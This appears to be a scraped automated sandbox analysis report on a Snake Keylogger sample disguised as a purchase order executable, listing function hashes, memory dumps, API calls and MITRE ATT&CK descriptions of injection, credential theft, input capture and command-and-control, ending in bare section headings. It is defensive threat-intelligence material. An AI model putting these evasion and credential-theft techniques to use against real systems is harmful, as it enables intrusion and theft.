Instruction Fuzzy Hash: D22186B9D042189FCB10CFA9D484AEEFBF4BB59324F14906AE918B7300D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D6F0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.661518572.0000000000A0D000.00000040.00000001.sdmp, Offset: 00A0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3156e7c163ed47d9c324a2c02b69141e4c8b62e2566cb34ca9ea25cafecda0a
Instruction ID: 9d2e4976cc7857e6712060b774046f81e8cd3ea4fc54050ed3013933db159b0e
Opcode Fuzzy Hash: f3156e7c163ed47d9c324a2c02b69141e4c8b62e2566cb34ca9ea25cafecda0a
Instruction Fuzzy Hash: 722125B6508208DFCB01DF54E8C0B26BFA5FB98324F24C569E9054B286C336D855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D6EB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.661518572.0000000000A0D000.00000040.00000001.sdmp, Offset: 00A0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction ID: 51099ffca3fd0aaa4e257aa3cdfc2ba439576adee2c9a49b57f4ce12915d8b71
Opcode Fuzzy Hash: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction Fuzzy Hash: 6011D076404284DFCB12CF54E9C4B16BF71FB88320F28C6A9D8040B656C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D045, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.661518572.0000000000A0D000.00000040.00000001.sdmp, Offset: 00A0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3bd3d10b96f3af9f1c40319842b6f24fbc8c1cfa7d9a5db4340a7a096d4e32c
Instruction ID: fe93540ddf6cb91a5015e3698f49137b0a2539e8e21966d415874a26bb8549c0
Opcode Fuzzy Hash: a3bd3d10b96f3af9f1c40319842b6f24fbc8c1cfa7d9a5db4340a7a096d4e32c
Instruction Fuzzy Hash: 4501D47240C3889AE7104F65DC84767FBA8EB41364F18C56AEA0A5A6C6C3759846CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D044, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.661518572.0000000000A0D000.00000040.00000001.sdmp, Offset: 00A0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0937a102a8540e48c36eb4d45e0bda437ea30e5e6d9b37202e12624e2edfc963
Instruction ID: fbf78295ff803716338e57f7cc1cc595226fb303875e72f398593776fdaa9ebf
Opcode Fuzzy Hash: 0937a102a8540e48c36eb4d45e0bda437ea30e5e6d9b37202e12624e2edfc963
Instruction Fuzzy Hash: 2DF062724082889AEB108F19DCC9B63FF98EB81774F18C45AED495F2C6C3799845CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: PURCHASE ORDER E3007921.EXE PID: 7024 Parent PID: 6848 PURCHASE ORDER E3007921.EXECOMMON

Executed Functions

Function 05F70040, Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1879libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F70927

Strings

Y, xrefs: 05F71FD4

Memory Dump Source

Source File: 00000003.00000002.922885586.0000000005F70000.00000040.00000001.sdmp, Offset: 05F70000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 21910aa03dace7f7a7c13ed766a3f4cf0f3f087e03ab95e53eb4c1106deb200b
Instruction ID: e43d67c78a45384d4e55b41ae8e9fecc65038a2baf7b35c89bf6067f8f9d79e0
Opcode Fuzzy Hash: 21910aa03dace7f7a7c13ed766a3f4cf0f3f087e03ab95e53eb4c1106deb200b
Instruction Fuzzy Hash: 2C130970D106198ECB24EF68C884AEDF7B1FF89304F54C69AD559AB251EB70AAC4CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05F70007, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 785libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F70927

Strings

Y, xrefs: 05F71FD4

Memory Dump Source

Source File: 00000003.00000002.922885586.0000000005F70000.00000040.00000001.sdmp, Offset: 05F70000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: d0aac8934309b03983a3dfbb766ce841bb0566006f41118f498a3cf12d4656ae
Instruction ID: 297055bb995a30429c7a50b8bd73f1c3d8914937a567037ef19a4fba13da8d3f
Opcode Fuzzy Hash: d0aac8934309b03983a3dfbb766ce841bb0566006f41118f498a3cf12d4656ae
Instruction Fuzzy Hash: 3F820870D006198FCB24DF68C884A9DFBF1BF89304F14C6AAD559AB255EB30AAC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05F72D50, Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F72D6F

Memory Dump Source

Source File: 00000003.00000002.922885586.0000000005F70000.00000040.00000001.sdmp, Offset: 05F70000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2cdc2eedb8b7de8df78574a41e9507da20c7e6046c634a85c016f258300fc27a
Instruction ID: 8d46a895281aaace5887a954eab93ea12a23115eb46f0dc003ac463bae42dff1
Opcode Fuzzy Hash: 2cdc2eedb8b7de8df78574a41e9507da20c7e6046c634a85c016f258300fc27a
Instruction Fuzzy Hash: 1F314C79A041099BDB04CF55D5C4AEDFBF2FF84314F25C25AE4046B285C739AD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DCA1, Relevance: 1.8, APIs: 1, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.920845265.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638c179b0e9890b6e529211e16a8599fd5b2160f73929f835d0174cdf842554e
Instruction ID: 6dbeb63bfaa70540f02f345d8d841f2af635925b21f18c3ddb6d794a819e4a10
Opcode Fuzzy Hash: 638c179b0e9890b6e529211e16a8599fd5b2160f73929f835d0174cdf842554e
Instruction Fuzzy Hash: 53D12430640209CFD718ABB4F95C7997BB2EF88306F1684A9E506EB6B0CF789D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05F72A58, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.922885586.0000000005F70000.00000040.00000001.sdmp, Offset: 05F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29169635574853bf5190694721f3e0b9fbb13dd30a0c23752cbd139ef834e25e
Instruction ID: eb331d8c7654d807120b69732fae0299afdbc070bb08a643862842b7e3a2bd7f
Opcode Fuzzy Hash: 29169635574853bf5190694721f3e0b9fbb13dd30a0c23752cbd139ef834e25e
Instruction Fuzzy Hash: 1661AE35A05208DFDB15EF68D8847EDBBF1FF85324F15816AE400AB791C7799886CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E098, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00E7E0AB

Memory Dump Source

Source File: 00000003.00000002.920845265.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6c0d84624cbf45d6951306e92e0c607cc736ef27fc236fde6eeee008db052838
Instruction ID: fa982c49e160ae501016cf9adf2d0f9916a7a1c258714c2877a141dad4c1c6dd
Opcode Fuzzy Hash: 6c0d84624cbf45d6951306e92e0c607cc736ef27fc236fde6eeee008db052838
Instruction Fuzzy Hash: AF31C8392210598FD7096BB0FE8E20C3BA5FB94306B2791A5E90AA1074CFA94D929B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E08F, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00E7E0AB

Memory Dump Source

Source File: 00000003.00000002.920845265.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bf1ace73811cd7eb40f7b319e4b51a6e79def9b8dd997271cdbed46123c70be0
Instruction ID: 016a61a33f69e33677addc44fb86f893d93625f9800816cfa5aeadc5362ca825
Opcode Fuzzy Hash: bf1ace73811cd7eb40f7b319e4b51a6e79def9b8dd997271cdbed46123c70be0
Instruction Fuzzy Hash: FE31D93922105DCFD709ABB0FA8E24C3F75FB94306B2391A5E80AA1074CBB94D92DF50

Uniqueness

Uniqueness Score: -1.00%

Function 05F4C6C4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05F4CA9E,?,?,?,?,?), ref: 05F4CB5F

Memory Dump Source

Source File: 00000003.00000002.922798380.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ea4af2398822305af19c6a4689fa028c4e8db5705ba5666966b7645db630f6a
Instruction ID: ff2b8c64a581f2917d77cb9aa2c815cd775c77f635035eafe0f157d718472cb0
Opcode Fuzzy Hash: 4ea4af2398822305af19c6a4689fa028c4e8db5705ba5666966b7645db630f6a
Instruction Fuzzy Hash: F621E5B5D452489FDB10CFA9D584ADEBBF8FB48314F14802AE914B7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05F4CAD0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05F4CA9E,?,?,?,?,?), ref: 05F4CB5F

Memory Dump Source

Source File: 00000003.00000002.922798380.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 06f9d02759123e9c567c038bd9c1d394ee0e93d260b5a75dcb32c8035f30bfe5
Instruction ID: 8de1e2e265d49663534cbc158ec8a37547d1cefa6bcf8423939618006c71f6fa
Opcode Fuzzy Hash: 06f9d02759123e9c567c038bd9c1d394ee0e93d260b5a75dcb32c8035f30bfe5
Instruction Fuzzy Hash: 1521E6B5D01248AFDB10CFA9D984ADEBBF4FB48324F14802AE914A7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05F72D40, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F72D6F

Memory Dump Source

Source File: 00000003.00000002.922885586.0000000005F70000.00000040.00000001.sdmp, Offset: 05F70000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a5b3ba41588b334ee6762b626cd98918fed5c55c27293edb67ad380a05522bb
Instruction ID: f0f5baeff3c8f5c2fd972d45df44400472920c84eeafe392f718c9e39d9dfc5c
Opcode Fuzzy Hash: 1a5b3ba41588b334ee6762b626cd98918fed5c55c27293edb67ad380a05522bb
Instruction Fuzzy Hash: 40018F75E11208ABEB04DF99E484ADDFBB6FF84310F14912AE40077240CB755986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DBD4F0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.920720239.0000000000DBD000.00000040.00000001.sdmp, Offset: 00DBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d902c3a2fd86a50f8d91f7ea7ed7bf47d982bf4e0e394471a46669b508f69461
Instruction ID: 34854922f517f0870c68b87fec054f23702c985bde42fdd3a09fe5b2a085c27d
Opcode Fuzzy Hash: d902c3a2fd86a50f8d91f7ea7ed7bf47d982bf4e0e394471a46669b508f69461
Instruction Fuzzy Hash: AB2125B1508204DFDB25DF10D8C0B66BFE6FB98328F28C569E9064B246D336D855CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD030, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.920739690.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3642adbf96a89152d0819986bf698f74a4e3c4f19a9a0c2c4add803778d59502
Instruction ID: b2ee0bd2a0354ba23f0868d89061446e74062e93d696d653dca679b4e8d57415
Opcode Fuzzy Hash: 3642adbf96a89152d0819986bf698f74a4e3c4f19a9a0c2c4add803778d59502
Instruction Fuzzy Hash: D021D3B1508245DFCB10DF18DDC0F26BBA6EB88314F24C5BDE9494B246C376D846DA71

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD005, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.920739690.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8440521e8e0be8b9708d93cbc2c1df1690c9b365c44290af387cee2d41a62c3
Instruction ID: 6de2289aa7ac2865db7f42c23fe9543ab45893007e1c2b937b342c92d36270cb
Opcode Fuzzy Hash: f8440521e8e0be8b9708d93cbc2c1df1690c9b365c44290af387cee2d41a62c3
Instruction Fuzzy Hash: 1F21607550D3C09FDB13CB24C990B15BF71AB46214F29C5EBD8848F6A7C37A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DBD4EB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.920720239.0000000000DBD000.00000040.00000001.sdmp, Offset: 00DBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction ID: e8621b7706a372bd8476caf33f3f0e715970fe1b288c27cb11dc06e348ed4f67
Opcode Fuzzy Hash: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction Fuzzy Hash: 9711E676404280CFCF11CF10D5C4B56BFB2FB89324F28C6A9D8050B656D33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PURCHASE ORDER E3007921.EXE

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Snake Keylogger

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets